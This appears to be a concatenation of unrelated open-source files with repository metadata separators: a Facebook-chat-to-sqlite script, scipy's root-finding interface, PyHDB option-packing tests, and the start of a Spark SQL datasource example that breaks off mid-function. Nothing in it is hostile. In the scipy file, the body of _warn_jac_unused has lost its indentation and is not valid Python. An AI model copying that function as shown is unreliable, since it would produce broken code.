        # now count keys in bucket
        n = 0
        for key in self.bucket:
            n += 1
        self.assertEqual(n, 0)
| apache-2.0 |
andyoberlin/FacebookChatAnalysis | createMessagesDB.py | 1 | 1707 | import sqlite3
import json
from optparse import OptionParser
def makeSchema(db):
    """Create the message-database tables in *db*.

    Reads the SQL DDL from the local file 'messages.sql' and executes it
    against the sqlite3 database at path *db* (created if missing).
    """
    # Context manager guarantees the schema file is closed even on error;
    # the original leaked the file handle and connection on exceptions.
    with open('messages.sql', 'r') as schema_file:
        schema = schema_file.read()
    conn = sqlite3.connect(db)
    try:
        # executescript() commits any pending transaction by itself.
        conn.executescript(schema)
    finally:
        conn.close()
def loadMessages(messages):
    """Return the JSON-decoded contents of the file at path *messages*."""
    # 'with' closes the file even if parsing fails (the original leaked the
    # handle on error); json.load() parses the stream directly instead of
    # materializing the whole text first.
    with open(messages, 'r') as messages_file:
        return json.load(messages_file)
def addMessageToDB(message, db):
    """Insert one exported Facebook message dict into the sqlite3 database.

    The sender name is taken from message['from']['name'] (or 'UNKNOWN' if
    absent), the text from message['message'] (or 'NULL'), and the timestamp
    from message['created_time'].  The sender is added to the friend table
    if not already present, then the message row references that friend id.
    """
    print(message)
    # 'in' replaces the removed-in-Python-3 dict.has_key(); works on 2 and 3.
    name = message['from']['name'] if 'from' in message else 'UNKNOWN'
    text = message['message'] if 'message' in message else 'NULL'
    time = message['created_time']
    conn = sqlite3.connect(db)
    try:
        cursor = conn.cursor()
        # Register the sender, then look up its (possibly pre-existing) id.
        cursor.execute("INSERT OR IGNORE INTO friend(name) VALUES (?);", (name, ))
        conn.commit()
        userID = cursor.execute("SELECT id FROM friend WHERE name=?;",
                                (name, )).fetchone()[0]
        cursor.execute("INSERT OR IGNORE INTO message(sender, message, time) VALUES (?, ?, ?);",
                       (userID, text, time))
        conn.commit()
        cursor.close()
    finally:
        # Original leaked the connection if any statement raised.
        conn.close()
if __name__ == '__main__':
    # Command-line entry point: build the schema, then import every message
    # from the exported JSON file into the sqlite3 database.
    parser = OptionParser()
    parser.add_option("-d", "--database", dest="database", default="messages.db", help="Filename for the sqlite3 database")
    parser.add_option("-m", "--messages", dest="messages", default="messages.json", help="Filename for the messages in json")
    opts = parser.parse_args()[0]
    makeSchema(opts.database)
    for message in loadMessages(opts.messages):
        addMessageToDB(message, opts.database)
| apache-2.0 |
ales-erjavec/scipy | scipy/optimize/_root.py | 109 | 26007 | """
Unified interfaces to root finding algorithms.
Functions
---------
- root : find a root of a vector function.
"""
from __future__ import division, print_function, absolute_import
__all__ = ['root']
import numpy as np
from scipy._lib.six import callable
from warnings import warn
from .optimize import MemoizeJac, OptimizeResult, _check_unknown_options
from .minpack import _root_hybr, leastsq
from ._spectral import _root_df_sane
from . import nonlin
def root(fun, x0, args=(), method='hybr', jac=None, tol=None, callback=None,
         options=None):
    """
    Find a root of a vector function.

    Parameters
    ----------
    fun : callable
        A vector function to find a root of.
    x0 : ndarray
        Initial guess.
    args : tuple, optional
        Extra arguments passed to the objective function and its Jacobian.
    method : str, optional
        Type of solver. Should be one of

            - 'hybr' :ref:`(see here) <optimize.root-hybr>`
            - 'lm' :ref:`(see here) <optimize.root-lm>`
            - 'broyden1' :ref:`(see here) <optimize.root-broyden1>`
            - 'broyden2' :ref:`(see here) <optimize.root-broyden2>`
            - 'anderson' :ref:`(see here) <optimize.root-anderson>`
            - 'linearmixing' :ref:`(see here) <optimize.root-linearmixing>`
            - 'diagbroyden' :ref:`(see here) <optimize.root-diagbroyden>`
            - 'excitingmixing' :ref:`(see here) <optimize.root-excitingmixing>`
            - 'krylov' :ref:`(see here) <optimize.root-krylov>`
            - 'df-sane' :ref:`(see here) <optimize.root-dfsane>`

    jac : bool or callable, optional
        If `jac` is a Boolean and is True, `fun` is assumed to return the
        value of Jacobian along with the objective function. If False, the
        Jacobian will be estimated numerically.
        `jac` can also be a callable returning the Jacobian of `fun`. In
        this case, it must accept the same arguments as `fun`.
    tol : float, optional
        Tolerance for termination. For detailed control, use solver-specific
        options.
    callback : function, optional
        Optional callback function. It is called on every iteration as
        ``callback(x, f)`` where `x` is the current solution and `f`
        the corresponding residual. For all methods but 'hybr' and 'lm'.
    options : dict, optional
        A dictionary of solver options. E.g. `xtol` or `maxiter`, see
        :obj:`show_options()` for details.

    Returns
    -------
    sol : OptimizeResult
        The solution represented as a ``OptimizeResult`` object.
        Important attributes are: ``x`` the solution array, ``success`` a
        Boolean flag indicating if the algorithm exited successfully and
        ``message`` which describes the cause of the termination. See
        `OptimizeResult` for a description of other attributes.

    See also
    --------
    show_options : Additional options accepted by the solvers

    Notes
    -----
    This section describes the available solvers that can be selected by the
    'method' parameter. The default method is *hybr*.

    Method *hybr* uses a modification of the Powell hybrid method as
    implemented in MINPACK [1]_.

    Method *lm* solves the system of nonlinear equations in a least squares
    sense using a modification of the Levenberg-Marquardt algorithm as
    implemented in MINPACK [1]_.

    Method *df-sane* is a derivative-free spectral method. [3]_

    Methods *broyden1*, *broyden2*, *anderson*, *linearmixing*,
    *diagbroyden*, *excitingmixing*, *krylov* are inexact Newton methods,
    with backtracking or full line searches [2]_. Each method corresponds
    to a particular Jacobian approximations. See `nonlin` for details.

    - Method *broyden1* uses Broyden's first Jacobian approximation, it is
      known as Broyden's good method.
    - Method *broyden2* uses Broyden's second Jacobian approximation, it
      is known as Broyden's bad method.
    - Method *anderson* uses (extended) Anderson mixing.
    - Method *Krylov* uses Krylov approximation for inverse Jacobian. It
      is suitable for large-scale problem.
    - Method *diagbroyden* uses diagonal Broyden Jacobian approximation.
    - Method *linearmixing* uses a scalar Jacobian approximation.
    - Method *excitingmixing* uses a tuned diagonal Jacobian
      approximation.

    .. warning::

        The algorithms implemented for methods *diagbroyden*,
        *linearmixing* and *excitingmixing* may be useful for specific
        problems, but whether they will work may depend strongly on the
        problem.

    .. versionadded:: 0.11.0

    References
    ----------
    .. [1] More, Jorge J., Burton S. Garbow, and Kenneth E. Hillstrom.
       1980. User Guide for MINPACK-1.
    .. [2] C. T. Kelley. 1995. Iterative Methods for Linear and Nonlinear
       Equations. Society for Industrial and Applied Mathematics.
       <http://www.siam.org/books/kelley/>
    .. [3] W. La Cruz, J.M. Martinez, M. Raydan. Math. Comp. 75, 1429 (2006).

    Examples
    --------
    The following functions define a system of nonlinear equations and its
    jacobian.

    >>> def fun(x):
    ...     return [x[0] + 0.5 * (x[0] - x[1])**3 - 1.0,
    ...             0.5 * (x[1] - x[0])**3 + x[1]]

    >>> def jac(x):
    ...     return np.array([[1 + 1.5 * (x[0] - x[1])**2,
    ...                       -1.5 * (x[0] - x[1])**2],
    ...                      [-1.5 * (x[1] - x[0])**2,
    ...                       1 + 1.5 * (x[1] - x[0])**2]])

    A solution can be obtained as follows.

    >>> from scipy import optimize
    >>> sol = optimize.root(fun, [0, 0], jac=jac, method='hybr')
    >>> sol.x
    array([ 0.8411639,  0.1588361])
    """
    # Allow a single bare extra argument so it can be splatted into solvers.
    if not isinstance(args, tuple):
        args = (args,)

    meth = method.lower()
    if options is None:
        options = {}

    # The MINPACK-based solvers ('hybr', 'lm') have no per-iteration hook.
    if callback is not None and meth in ('hybr', 'lm'):
        warn('Method %s does not accept callback.' % method,
             RuntimeWarning)

    # fun also returns the jacobian
    if not callable(jac) and meth in ('hybr', 'lm'):
        if bool(jac):
            fun = MemoizeJac(fun)
            jac = fun.derivative
        else:
            jac = None

    # set default tolerances
    if tol is not None:
        options = dict(options)  # copy so the caller's dict is not mutated
        if meth in ('hybr', 'lm'):
            options.setdefault('xtol', tol)
        elif meth in ('df-sane',):
            options.setdefault('ftol', tol)
        elif meth in ('broyden1', 'broyden2', 'anderson', 'linearmixing',
                      'diagbroyden', 'excitingmixing', 'krylov'):
            # Only the relative step criterion follows `tol`; the other
            # criteria are disabled so `tol` alone governs convergence.
            options.setdefault('xtol', tol)
            options.setdefault('xatol', np.inf)
            options.setdefault('ftol', np.inf)
            options.setdefault('fatol', np.inf)

    # Dispatch to the selected solver implementation.
    if meth == 'hybr':
        sol = _root_hybr(fun, x0, args=args, jac=jac, **options)
    elif meth == 'lm':
        sol = _root_leastsq(fun, x0, args=args, jac=jac, **options)
    elif meth == 'df-sane':
        _warn_jac_unused(jac, method)
        sol = _root_df_sane(fun, x0, args=args, callback=callback,
                            **options)
    elif meth in ('broyden1', 'broyden2', 'anderson', 'linearmixing',
                  'diagbroyden', 'excitingmixing', 'krylov'):
        _warn_jac_unused(jac, method)
        sol = _root_nonlin_solve(fun, x0, args=args, jac=jac,
                                 _method=meth, _callback=callback,
                                 **options)
    else:
        raise ValueError('Unknown solver %s' % method)

    return sol
def _warn_jac_unused(jac, method):
if jac is not None:
warn('Method %s does not use the jacobian (jac).' % (method,),
RuntimeWarning)
def _root_leastsq(func, x0, args=(), jac=None,
                  col_deriv=0, xtol=1.49012e-08, ftol=1.49012e-08,
                  gtol=0.0, maxiter=0, eps=0.0, factor=100, diag=None,
                  **unknown_options):
    """
    Solve for least squares with Levenberg-Marquardt

    Options
    -------
    col_deriv : bool
        non-zero to specify that the Jacobian function computes derivatives
        down the columns (faster, because there is no transpose operation).
    ftol : float
        Relative error desired in the sum of squares.
    xtol : float
        Relative error desired in the approximate solution.
    gtol : float
        Orthogonality desired between the function vector and the columns
        of the Jacobian.
    maxiter : int
        The maximum number of calls to the function. If zero, then
        100*(N+1) is the maximum where N is the number of elements in x0.
    epsfcn : float
        A suitable step length for the forward-difference approximation of
        the Jacobian (for Dfun=None). If epsfcn is less than the machine
        precision, it is assumed that the relative errors in the functions
        are of the order of the machine precision.
    factor : float
        A parameter determining the initial step bound
        (``factor * || diag * x||``). Should be in interval ``(0.1, 100)``.
    diag : sequence
        N positive entries that serve as a scale factors for the variables.
    """
    _check_unknown_options(unknown_options)
    # The generic names used by `root` map onto MINPACK's naming:
    # maxiter -> maxfev, eps -> epsfcn, jac -> Dfun.
    x, cov_x, info, msg, ier = leastsq(func, x0, args=args, Dfun=jac,
                                       full_output=True,
                                       col_deriv=col_deriv, xtol=xtol,
                                       ftol=ftol, gtol=gtol,
                                       maxfev=maxiter, epsfcn=eps,
                                       factor=factor, diag=diag)
    # leastsq's ier codes 1-4 all indicate successful termination.
    sol = OptimizeResult(x=x, message=msg, status=ier,
                         success=ier in (1, 2, 3, 4), cov_x=cov_x,
                         fun=info.pop('fvec'))
    sol.update(info)
    return sol
def _root_nonlin_solve(func, x0, args=(), jac=None,
                       _callback=None, _method=None,
                       nit=None, disp=False, maxiter=None,
                       ftol=None, fatol=None, xtol=None, xatol=None,
                       tol_norm=None, line_search='armijo', jac_options=None,
                       **unknown_options):
    """Common driver for the quasi-Newton solvers in `scipy.optimize.nonlin`."""
    _check_unknown_options(unknown_options)

    # Translate the public option names into `nonlin.nonlin_solve` naming:
    # absolute tolerances map to *_tol, relative ones to *_rtol.
    f_tol = fatol
    f_rtol = ftol
    x_tol = xatol
    x_rtol = xtol
    verbose = disp
    if jac_options is None:
        jac_options = dict()

    # Select the Jacobian-approximation class matching the method name.
    jacobian = {'broyden1': nonlin.BroydenFirst,
                'broyden2': nonlin.BroydenSecond,
                'anderson': nonlin.Anderson,
                'linearmixing': nonlin.LinearMixing,
                'diagbroyden': nonlin.DiagBroyden,
                'excitingmixing': nonlin.ExcitingMixing,
                'krylov': nonlin.KrylovJacobian
                }[_method]

    if args:
        if jac:
            # func returns (residual, jacobian); keep only the residual.
            def f(x):
                return func(x, *args)[0]
        else:
            def f(x):
                return func(x, *args)
    else:
        f = func

    x, info = nonlin.nonlin_solve(f, x0, jacobian=jacobian(**jac_options),
                                  iter=nit, verbose=verbose,
                                  maxiter=maxiter, f_tol=f_tol,
                                  f_rtol=f_rtol, x_tol=x_tol,
                                  x_rtol=x_rtol, tol_norm=tol_norm,
                                  line_search=line_search,
                                  callback=_callback, full_output=True,
                                  raise_exception=False)
    sol = OptimizeResult(x=x)
    sol.update(info)
    return sol
def _root_broyden1_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            Initial guess for the Jacobian is (-1/alpha).
        reduction_method : str or tuple, optional
            Method used in ensuring that the rank of the Broyden
            matrix stays low. Can either be a string giving the
            name of the method, or a tuple of the form ``(method,
            param1, param2, ...)`` that gives the name of the
            method and values for additional parameters.

            Methods available:
                - ``restart``: drop all matrix columns. Has no
                  extra parameters.
                - ``simple``: drop oldest matrix column. Has no
                  extra parameters.
                - ``svd``: keep only the most significant SVD
                  components.
                  Extra parameters:
                      - ``to_retain``: number of SVD components to
                        retain when rank reduction is done.
                        Default is ``max_rank - 2``.
        max_rank : int, optional
            Maximum rank for the Broyden matrix.
            Default is infinity (ie., no rank reduction).
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_broyden2_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            Initial guess for the Jacobian is (-1/alpha).
        reduction_method : str or tuple, optional
            Method used in ensuring that the rank of the Broyden
            matrix stays low. Can either be a string giving the
            name of the method, or a tuple of the form ``(method,
            param1, param2, ...)`` that gives the name of the
            method and values for additional parameters.

            Methods available:
                - ``restart``: drop all matrix columns. Has no
                  extra parameters.
                - ``simple``: drop oldest matrix column. Has no
                  extra parameters.
                - ``svd``: keep only the most significant SVD
                  components.
                  Extra parameters:
                      - ``to_retain``: number of SVD components to
                        retain when rank reduction is done.
                        Default is ``max_rank - 2``.
        max_rank : int, optional
            Maximum rank for the Broyden matrix.
            Default is infinity (ie., no rank reduction).
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_anderson_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            Initial guess for the Jacobian is (-1/alpha).
        M : float, optional
            Number of previous vectors to retain. Defaults to 5.
        w0 : float, optional
            Regularization parameter for numerical stability.
            Compared to unity, good values of the order of 0.01.
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_linearmixing_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, ``NoConvergence`` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            initial guess for the jacobian is (-1/alpha).
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_diagbroyden_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            initial guess for the jacobian is (-1/alpha).
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_excitingmixing_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        alpha : float, optional
            Initial Jacobian approximation is (-1/alpha).
        alphamax : float, optional
            The entries of the diagonal Jacobian are kept in the range
            ``[alpha, alphamax]``.
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
def _root_krylov_doc():
    """
    Options
    -------
    nit : int, optional
        Number of iterations to make. If omitted (default), make as many
        as required to meet tolerances.
    disp : bool, optional
        Print status to stdout on every iteration.
    maxiter : int, optional
        Maximum number of iterations to make. If more are needed to
        meet convergence, `NoConvergence` is raised.
    ftol : float, optional
        Relative tolerance for the residual. If omitted, not used.
    fatol : float, optional
        Absolute tolerance (in max-norm) for the residual.
        If omitted, default is 6e-6.
    xtol : float, optional
        Relative minimum step size. If omitted, not used.
    xatol : float, optional
        Absolute minimum step size, as determined from the Jacobian
        approximation. If the step size is smaller than this, optimization
        is terminated as successful. If omitted, not used.
    tol_norm : function(vector) -> scalar, optional
        Norm to use in convergence check. Default is the maximum norm.
    line_search : {None, 'armijo' (default), 'wolfe'}, optional
        Which type of a line search to use to determine the step size in
        the direction given by the Jacobian approximation. Defaults to
        'armijo'.
    jac_options : dict, optional
        Options for the respective Jacobian approximation.

        rdiff : float, optional
            Relative step size to use in numerical differentiation.
        method : {'lgmres', 'gmres', 'bicgstab', 'cgs', 'minres'} or function
            Krylov method to use to approximate the Jacobian.
            Can be a string, or a function implementing the same
            interface as the iterative solvers in
            `scipy.sparse.linalg`.

            The default is `scipy.sparse.linalg.lgmres`.
        inner_M : LinearOperator or InverseJacobian
            Preconditioner for the inner Krylov iteration.
            Note that you can use also inverse Jacobians as (adaptive)
            preconditioners. For example,

            >>> jac = BroydenFirst()
            >>> kjac = KrylovJacobian(inner_M=jac.inverse).

            If the preconditioner has a method named 'update', it will
            be called as ``update(x, f)`` after each nonlinear step,
            with ``x`` giving the current point, and ``f`` the current
            function value.
        inner_tol, inner_maxiter, ...
            Parameters to pass on to the "inner" Krylov solver.
            See `scipy.sparse.linalg.gmres` for details.
        outer_k : int, optional
            Size of the subspace kept across LGMRES nonlinear
            iterations.
            See `scipy.sparse.linalg.lgmres` for details.
    """
    # Documentation-only stub: the options text is presumably rendered by
    # scipy.optimize.show_options() (see `root`); the body is intentionally empty.
    pass
| bsd-3-clause |
TwoLaid/PyHDB | tests/parts/test_options.py | 9 | 4931 | # Copyright 2014, 2015 SAP SE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: //www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from io import BytesIO
import pytest
from pyhdb.exceptions import InterfaceError
from pyhdb.protocol.parts import OptionPart
from pyhdb.protocol import constants
def test_not_pack_none_value_items():
    """Options whose value is None must be omitted from the packed payload."""
    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "int_field": (1, 3),
            "bigint_field": (2, 4),
            "bool_field": (3, 28)
        }

    num_args, _ = DummyOptionPart({
        "int_field": 123456789,
        "bigint_field": None,
        "bool_field": True
    }).pack_data(constants.MAX_SEGMENT_SIZE)
    # Only the two non-None options are serialized.
    assert num_args == 2
def test_unknown_option_is_not_packable():
    """Packing an option absent from option_definition raises InterfaceError."""
    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "int_field": (1, 3),
        }

    with pytest.raises(InterfaceError) as excinfo:
        DummyOptionPart({"unknown_option": 12345}).pack_data(
            constants.MAX_SEGMENT_SIZE)
    assert "Unknown option identifier" in excinfo.exconly()
class TestOptionPartBooleanType(object):
    """Round-trip pack/unpack of a boolean option (type code 28 = 0x1C).

    The payloads below show the wire format: one identifier byte, one
    type-code byte, then the value (a single 0/1 byte for booleans).
    """

    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "bool_field": (1, 28)
        }

    def test_pack_true(self):
        # Expected bytes: identifier 0x01, type 0x1C (28), value 0x01 (True).
        arguments, payload = self.DummyOptionPart({
            "bool_field": True
        }).pack_data(constants.MAX_SEGMENT_SIZE)
        assert arguments == 1
        assert payload == b"\x01\x1C\x01"

    def test_pack_false(self):
        # Same layout with value byte 0x00 (False).
        arguments, payload = self.DummyOptionPart({
            "bool_field": False
        }).pack_data(constants.MAX_SEGMENT_SIZE)
        assert arguments == 1
        assert payload == b"\x01\x1C\x00"

    def test_unpack_true(self):
        options, = self.DummyOptionPart.unpack_data(
            1,
            BytesIO(b"\x01\x1C\x01")
        )
        assert options == {"bool_field": True}

    def test_unpack_false(self):
        options, = self.DummyOptionPart.unpack_data(
            1,
            BytesIO(b"\x01\x1C\x00")
        )
        assert options == {"bool_field": False}
class TestOptionPartInt(object):
    """Round-trip pack/unpack of a 32-bit integer option (type code 3)."""

    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "int_field": (1, 3)
        }

    def test_pack(self):
        # Expected bytes: identifier 0x01, type 0x03, then 123456
        # (= 0x0001E240) as four little-endian bytes.
        arguments, payload = self.DummyOptionPart({
            "int_field": 123456
        }).pack_data(constants.MAX_SEGMENT_SIZE)
        assert arguments == 1
        assert payload == b"\x01\x03\x40\xE2\x01\x00"

    def test_unpack(self):
        options, = self.DummyOptionPart.unpack_data(
            1,
            BytesIO(b"\x01\x03\x40\xE2\x01\x00")
        )
        assert options == {"int_field": 123456}
class TestOptionPartBigInt(object):
    """Round-trip pack/unpack of a 64-bit integer option (type code 4)."""

    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "bigint_field": (1, 4)
        }

    def test_pack(self):
        # Expected bytes: identifier 0x01, type 0x04, then 2**32 as eight
        # little-endian bytes (the 1 lands in the fifth byte).
        arguments, payload = self.DummyOptionPart({
            "bigint_field": 2**32
        }).pack_data(constants.MAX_SEGMENT_SIZE)
        assert arguments == 1
        assert payload == b"\x01\x04\x00\x00\x00\x00\x01\x00\x00\x00"

    def test_unpack(self):
        options, = self.DummyOptionPart.unpack_data(
            1,
            BytesIO(b"\x01\x04\x00\x00\x00\x00\x01\x00\x00\x00")
        )
        assert options == {"bigint_field": 2**32}
class TestOptionPartString(object):
    """Round-trip pack/unpack of a string option (type code 29 = 0x1D)."""

    class DummyOptionPart(OptionPart):
        kind = 126
        option_definition = {
            # Identifier, (Value, Type)
            "string_field": (1, 29)
        }

    def test_pack(self):
        # Expected bytes: identifier 0x01, type 0x1D, two-byte little-endian
        # length (0x000B = 11), then the encoded text "Hello World".
        arguments, payload = self.DummyOptionPart({
            "string_field": u"Hello World"
        }).pack_data(constants.MAX_SEGMENT_SIZE)
        assert arguments == 1
        assert payload == b"\x01\x1d\x0b\x00\x48\x65\x6c\x6c" \
                          b"\x6f\x20\x57\x6f\x72\x6c\x64"

    def test_unpack(self):
        options, = self.DummyOptionPart.unpack_data(
            1,
            BytesIO(
                b"\x01\x1d\x0b\x00\x48\x65\x6c\x6c"
                b"\x6f\x20\x57\x6f\x72\x6c\x64"
            )
        )
        assert options == {"string_field": u"Hello World"}
| apache-2.0 |
patrick-nicholson/spark | examples/src/main/python/sql/datasource.py | 8 | 7058 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
from pyspark.sql import SparkSession
# $example on:schema_merging$
from pyspark.sql import Row
# $example off:schema_merging$
"""
A simple example demonstrating Spark SQL data sources.
Run with:
./bin/spark-submit examples/src/main/python/sql/datasource.py
"""
def basic_datasource_example(spark):
    """Show generic load/save, explicit format options, and SQL run directly on files.

    The ``$example`` marker comments delimit the snippets included in the
    Spark SQL documentation; keep them intact.
    """
    # $example on:generic_load_save_functions$
    df = spark.read.load("examples/src/main/resources/users.parquet")
    df.select("name", "favorite_color").write.save("namesAndFavColors.parquet")
    # $example off:generic_load_save_functions$

    # $example on:manual_load_options$
    df = spark.read.load("examples/src/main/resources/people.json", format="json")
    df.select("name", "age").write.save("namesAndAges.parquet", format="parquet")
    # $example off:manual_load_options$

    # $example on:direct_sql$
    df = spark.sql("SELECT * FROM parquet.`examples/src/main/resources/users.parquet`")
    # $example off:direct_sql$
def parquet_example(spark):
    """Write a DataFrame as Parquet, read it back, and query it via a temp view."""
    # $example on:basic_parquet_example$
    peopleDF = spark.read.json("examples/src/main/resources/people.json")

    # DataFrames can be saved as Parquet files, maintaining the schema information.
    peopleDF.write.parquet("people.parquet")

    # Read in the Parquet file created above.
    # Parquet files are self-describing so the schema is preserved.
    # The result of loading a parquet file is also a DataFrame.
    parquetFile = spark.read.parquet("people.parquet")

    # Parquet files can also be used to create a temporary view and then used in SQL statements.
    parquetFile.createOrReplaceTempView("parquetFile")
    teenagers = spark.sql("SELECT name FROM parquetFile WHERE age >= 13 AND age <= 19")
    teenagers.show()
    # +------+
    # |  name|
    # +------+
    # |Justin|
    # +------+
    # $example off:basic_parquet_example$
def parquet_schema_merging_example(spark):
    """Merge differing Parquet schemas across partition directories with mergeSchema."""
    # $example on:schema_merging$
    # spark is from the previous example.
    # Create a simple DataFrame, stored into a partition directory
    sc = spark.sparkContext

    squaresDF = spark.createDataFrame(sc.parallelize(range(1, 6))
                                      .map(lambda i: Row(single=i, double=i ** 2)))
